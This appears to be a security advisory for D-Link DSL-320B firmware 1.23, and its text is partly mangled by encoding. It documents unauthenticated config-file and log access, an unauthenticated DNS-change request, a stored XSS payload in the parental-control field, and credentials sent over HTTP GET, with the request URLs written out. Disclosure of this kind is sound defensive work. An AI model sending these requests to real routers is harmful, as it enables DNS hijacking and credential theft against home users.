Firmware Version: EU_DSL-320B v1.23 date: 28.12.2010
Developer: http://www.dlink.com/de/de/home-solutions/connect/modems-and-gateways/dsl-320b-adsl-2-ethernet-modem
Defects Overview
* Access to the Config file without authentication = & gt; full authentication bypass possible! :): (1)
192.168.178.111/config. bin
===& Lt; snip & gt ;==
& Lt; sysUserName value = "admin"/& gt;
& Lt; zipb enable = "1"/& gt;
& Lt; dns dynamic = "disable" primary = "1.1.1.1" secondary = "2.2.2.3" domain = "Home" host = "alpha"/& gt;
& Lt; sysPassword value = "dGVzdA ="/& gt;
===& Lt; snip & gt ;==
= & Gt; sysPassword is Base64 encoded
* Access to the logfile without authentication: (1)
192.168.178.111/status/status_log.sys
* Change the DNS Settings without authentication: (1)
Http: // 192.168.178.111/advanced/adv_dns.xgi? & SET/dns/mode = 0 & SET/dns/mode/server/primarydns = 1.1.1.1 & SET/dns/mode/server/secondarydns = 2.2.2.2
* Stored XSS within parental control (2 ):
= & Gt; Parameter: set/bwlist/entry: 1/hostname
Request:
Http: // 192.168.178.111/home/home_parent.xgi? & Set/bwlist/enable = 1 & set/bwlist/bw_status = 0 & set/bwlist/entry: 1/bw_flag = 0 & set/bwlist/entry: 1/hostname = % 22% 3E % 3 Cimg % 20src = % 220% 22% 20 onerror = alert (1) % 3E & set/bwlist/entry: 1/weekday = 6 & set/bwlist/entry: 1/begintime = 00:00 & set/bwlist/entry: 1/endtime = 23:59 & set/bwlist/entry: 1/store = 1 & set/bwlist/apply = 1
Again you are able to place this XSS without authentication .:)
* Login Credentials in http get are not a good idea = & gt; use HTTP Post! (3)
Http: // 192.168.178.111/login. xgi? User = admin & pass = admin1
* Credentials in http get via password change request are not a good idea = & gt; use HTTP Post! : (3)
Http: // 192.168.178.111/tools/tools_admin.xgi? & Set/sys/account/user/oldpwd = admin & set/sys/account/user/password = test & CMT = 1
Solution
Upgrade to version 1.25
(1)-fixed
(2)-not fixed but authentication needed
(3)-not fixed